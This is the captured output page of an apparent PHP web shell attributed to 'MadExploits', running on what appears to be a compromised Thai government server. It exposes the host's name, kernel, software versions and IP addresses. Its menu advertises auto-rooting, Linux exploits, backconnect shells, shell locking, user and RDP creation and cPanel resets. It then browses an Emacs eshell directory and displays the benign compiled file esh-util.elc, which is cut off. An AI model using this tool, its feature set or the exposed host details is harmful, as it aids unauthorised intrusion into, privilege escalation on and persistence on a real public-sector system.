Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
eshell /
[ HOME SHELL ]
Name
Size
Permission
Action
em-alias.elc
6.43
KB
-rw-r--r--
em-banner.elc
1.8
KB
-rw-r--r--
em-basic.elc
4.29
KB
-rw-r--r--
em-cmpl.elc
12.01
KB
-rw-r--r--
em-dirs.elc
16.05
KB
-rw-r--r--
em-glob.elc
8.89
KB
-rw-r--r--
em-hist.elc
28.77
KB
-rw-r--r--
em-ls.elc
26.32
KB
-rw-r--r--
em-pred.elc
15.71
KB
-rw-r--r--
em-prompt.elc
5.54
KB
-rw-r--r--
em-rebind.elc
7.59
KB
-rw-r--r--
em-script.elc
4.05
KB
-rw-r--r--
em-smart.elc
9.01
KB
-rw-r--r--
em-term.elc
3.7
KB
-rw-r--r--
em-unix.elc
34.76
KB
-rw-r--r--
em-xtra.elc
4.3
KB
-rw-r--r--
esh-arg.elc
10.52
KB
-rw-r--r--
esh-cmd.elc
38.67
KB
-rw-r--r--
esh-ext.elc
10.16
KB
-rw-r--r--
esh-groups.el
7.49
KB
-rw-r--r--
esh-io.elc
13.65
KB
-rw-r--r--
esh-mode.elc
29.36
KB
-rw-r--r--
esh-module.elc
2.76
KB
-rw-r--r--
esh-opt.elc
5.91
KB
-rw-r--r--
esh-proc.elc
16.39
KB
-rw-r--r--
esh-test.elc
6.82
KB
-rw-r--r--
esh-util.elc
21.43
KB
-rw-r--r--
esh-var.elc
15.01
KB
-rw-r--r--
eshell.elc
8.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : esh-util.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:03:11 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/eshell/esh-util.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`esh-util.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (custom-declare-group 'eshell-util nil "This is general utility code, meant for use by Eshell itself." :tag "General utilities" :group 'eshell) #@257 *If non-nil, the string representation of t is 't'. If nil, t will be represented only in the exit code of the function, and not printed as a string. This causes Lisp functions to behave similarly to external commands, as far as successful result output. (custom-declare-variable 'eshell-stringify-t 't '(#$ . -759) :type 'boolean :group 'eshell-util) #@57 *If non-nil, the name of the group file on your system. (custom-declare-variable 'eshell-group-file '"/etc/group" '(#$ . -1118) :type '(choice (const :tag "No group file" nil) file) :group 'eshell-util) #@58 *If non-nil, the name of the passwd file on your system. (custom-declare-variable 'eshell-passwd-file '"/etc/passwd" '(#$ . -1327) :type '(choice (const :tag "No passwd file" nil) file) :group 'eshell-util) #@35 *The name of the /etc/hosts file. (custom-declare-variable 'eshell-hosts-file '"/etc/hosts" '(#$ . -1540) :type '(choice (const :tag "No hosts file" nil) file) :group 'eshell-util) #@108 *If non-nil, Eshell will handle errors itself. Setting this to nil is offered as an aid to debugging only. (custom-declare-variable 'eshell-handle-errors 't '(#$ . -1728) :type 'boolean :group 'eshell-util) #@60 *The file-modes value to use for creating "private" files. (custom-declare-variable 'eshell-private-file-modes '384 '(#$ . -1941) :type 'integer :group 'eshell-util) #@66 *The file-modes value to use for creating "private" directories. (custom-declare-variable 'eshell-private-directory-modes '448 '(#$ . -2113) :type 'integer :group 'eshell-util) #@51 *Regular expression used to match tar file names. (custom-declare-variable 'eshell-tar-regexp '"\\.t\\(ar\\(\\.\\(gz\\|bz2\\|Z\\)\\)?\\|gz\\|a[zZ]\\|z2\\)\\'" '(#$ . -2296) :type 'regexp :group 'eshell-util) #@613 *If non-nil, converting arguments of numeric form to Lisp numbers. Numeric form is tested using the regular expression `eshell-number-regexp'. NOTE: If you find that numeric conversions are intefering with the specification of filenames (for example, in calling `find-file', or some other Lisp function that deals with files, not numbers), add the following in your .emacs file: (put 'find-file 'eshell-no-numeric-conversions t) Any function with the property `eshell-no-numeric-conversions' set to a non-nil value, will be passed strings, not numbers, even when an argument matches `eshell-number-regexp'. (custom-declare-variable 'eshell-convert-numeric-arguments 't '(#$ . -2511) :type 'boolean :group 'eshell-util) #@219 *Regular expression used to match numeric arguments. If `eshell-convert-numeric-arguments' is non-nil, and an argument matches this regexp, it will be converted to a Lisp number, using the function `string-to-number'. (custom-declare-variable 'eshell-number-regexp '"-?\\([0-9]*\\.\\)?[0-9]+\\(e[-0-9.]+\\)?" '(#$ . -3242) :type 'regexp :group 'eshell-util) #@68 *List of user/host/id strings, used to determine remote ownership. (custom-declare-variable 'eshell-ange-ls-uids 'nil '(#$ . -3606) :type '(repeat (cons :tag "Host for User/UID map" (string :tag "Hostname") (repeat (cons :tag "User/UID List" (string :tag "Username") (repeat :tag "UIDs" string))))) :group 'eshell-util) #@38 A cache to hold the names of groups. (defvar eshell-group-names nil (#$ . 3932)) #@46 A timestamp of when the group file was read. (defvar eshell-group-timestamp nil (#$ . 4019)) #@37 A cache to hold the names of users. (defvar eshell-user-names nil (#$ . 4118)) #@45 A timestamp of when the user file was read. (defvar eshell-user-timestamp nil (#$ . 4203)) #@49 A cache the names of frequently accessed hosts. (defvar eshell-host-names nil (#$ . 4300)) #@46 A timestamp of when the hosts file was read. (defvar eshell-host-timestamp nil (#$ . 4397)) #@56 Return non-nil if we are running under MS-DOS/Windows. (defalias 'eshell-under-windows-p #[nil "\301>\207" [system-type (ms-dos windows-nt)] 2 (#$ . 4495)]) (put 'eshell-under-windows-p 'byte-optimizer 'byte-compile-inline-expand) #@73 Like `condition-case', but only if `eshell-pass-through-errors' is nil. (defalias 'eshell-condition-case '(macro . #[(tag form &rest handlers) "\203\f \304 \nBBB\207\n\207" [eshell-handle-errors tag form handlers condition-case] 4 (#$ . 4733)])) (put 'eshell-condition-case 'lisp-indent-function 2) (defalias 'eshell-deftest '(macro . #[(module name label &rest forms) "\305\306!\205 \306 ?\205. \307\310\311!P!\312\313\314 \315\n\316\317D\317 D\n\317\320\fBD\257\257)DD\207" [name fsym label module forms fboundp cl-compiling-file intern "eshell-test--" symbol-name eval-when-compile ignore defun nil eshell-run-test quote progn] 13])) (put 'eshell-deftest 'lisp-indent-function 2) #@290 From point, find the CLOSE delimiter corresponding to OPEN. The matching is bounded by BOUND. If REVERSE-P is non-nil, process the region backwards. If BACKSLASH-P is non-nil, and OPEN and CLOSE are the same character, then quoting is done by a backslash, rather than a doubled delimiter. (defalias 'eshell-find-delimiter #[(open close &optional bound reverse-p backslash-p) "\212\306\206 d\n\203 `Sf=\202 \307f\f=\203' \n\203$ \310\202% \306u\210 \311V\203\n\2035 \312\2026 \313`\"\203\n\203F `Sf\202H \307f\307 \n\204| \f=\203[ \203| \314=\203| `Tf\211\203| \f=\204v =\203| \306u\210\202\n\n\203\250 \f=\203\213 \203\250 \f=\204\231 =\203\250 `SSf\314=\203\250 \310u\210\202\n\f=\203\341 \f=\203\n\204\333 \n\203\305 `SSf\202\310 `Tf\f=\203\333 \n\203\325 \310\202\326 \306u\210\202\n S\202\n \fU\203\367 \n\203\361 \310\202\362 \306\\\202\n U\203\n \n\203\306\202\310\\*\n\203\310\202\306u\210\202' \311U\205)\n\203'`\202)`S+\207" [bound depth reverse-p close open nc 1 nil -1 0 > < 92 c backslash-p] 3 (#$ . 5431)]) #@56 Convert STRING into a more native looking Lisp object. (defalias 'eshell-convert #[(string) ";\204 \207G\211\304U\203 \202F SH\305=\203# \304 SO\306\307\"\2031 \310\307\"\202F \n\203E \306\311\312Q\"\203E \313!\202F )\207" [string len eshell-convert-numeric-arguments eshell-number-regexp 0 10 string-match "\n" split-string "\\`\\s-*" "\\s-*\\'" string-to-number] 5 (#$ . 6519)]) #@87 Return from LIST the N to M elements. If N or M is nil, it means the end of the list. (defalias 'eshell-sublist #[(l &optional n m) "\305!\306\203 \233:\203 \233\306\241\210\f\203\"